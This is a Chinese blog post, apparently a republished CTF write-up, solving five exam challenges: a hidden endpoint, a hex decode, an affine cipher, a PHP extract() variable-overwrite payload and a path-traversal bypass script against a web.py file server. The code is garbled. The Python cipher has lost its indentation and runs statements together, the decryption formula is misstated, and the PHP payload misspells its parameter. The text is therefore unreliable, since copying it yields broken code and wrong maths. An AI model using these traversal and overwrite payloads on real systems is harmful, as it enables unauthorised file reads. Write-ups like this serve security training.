2019西电网安实验班选拔考试

最新推荐文章于 2021-06-20 12:52:29 发布

weixin_30920597

最新推荐文章于 2021-06-20 12:52:29 发布

阅读量1.1k

点赞数 1

文章标签： php python

原文链接：http://www.cnblogs.com/sylover/p/11299295.html

版权

1.FirstBlood

<div id="myInfo"
class="reveal-modal" style="display: none;">
 <h2>我的信息</h2> <blockquote> 
<p>队伍名称：测试用户</p>
 <p>口号：FirstBl00d</p>
 <!-- index.php/user/updatevoice?voice= -->
 <p>分数： 300</p> 
<p>已找到的FLAG： 3</p> 
</blockquote> 
<a class="close-reveal-modal">&#215;</a> 
</div>

访问url/index.php/user/updatevoice?voice=FirstBlood

2.十六进制字符串

打开题目，提示：

这是一个十六进制的字符串，解开后就知道flag在哪里了 666c61675f69735f686572657b3265346231303234613763386 3353432373139633637613064666333663432302e7068707d

直接将上面的数字扔进hex转换器转成字符

3.仿射密码

密文：yfsfnhtzlsrftclhwrffonw

在该仿射中，a=15，b=23

将得到的明文提交：

仿射密码规则为：c = (m * a + b) % 26

要得到明文则为：m = (c - b *a^(-1)) % 26

算法：

#coding=utf-8 
#求最大公约数 
def egcd(a, b): 
if a == 0: 
return (b, 0, 1)
 else:
g, y, x = egcd(b % a, a)
 return (g, x - (b // a) * y, y)
 #求模逆元素 
def modinv(a, m): 
g, x, y = egcd(a, m) 
if g != 1: 
raise Exception('modular inverse does not exist') 
else:
return x % m
 #欧拉函数 
def eular(n): 
count = 0 
for x in xrange(0,n): 
g,x,y = egcd(x,n) 
if g == 1:
 count = count + 1 
return count 
# 仿射密码 
def Affine_cipher(ciphertext,a,b): 
plantext = ''
 # 求逆元
 fa = modinv(a,26) for x in ciphertext: 
if x == ' ': 
plantext += ' '
 continue plantext += chr(ord('a')+((ord(x)-b)-ord('a'))*fa%26) 
return plantext

调用key得出明文

4.变量覆盖

<?php
$filename = 'x';
extract($_GET);
if(!empty($attempt))
{
    $conbination = trim(file_get_contents($filename));
    if ($attempt === $conbination)
    {
        echo "<p>neirong" . "$conbination!?</p>";
        require("flag.php");
        echo "<p>congratulation,key is:" . "$flag<p>";
    } else
        {
        echo "<p>Incorrenr!</p>";
        }
}
?>

payload：url?attempy=&filename=flag.php

5.web.py

def GET(self,filepath):
    if filepath.find("flag")>-1:
        return "Hacker"
    filepath = filepath.replace("../","")
    try:
        with open("./uploads/%s" % filepath,"rb") as f:
            content = f.read()
        return content
    except:
        return web.notfound("Sorry,the file you were looking for was not found.")

exp:

from requests import get

def get_flag():
    url = ""
    payload = url + ".../...//.../...//fla../g.txt"
    flag = get(payload).content
    return flag

if __name__ == "__main__":
    flag = get_flag()
    
    print "[x] flag :" +flag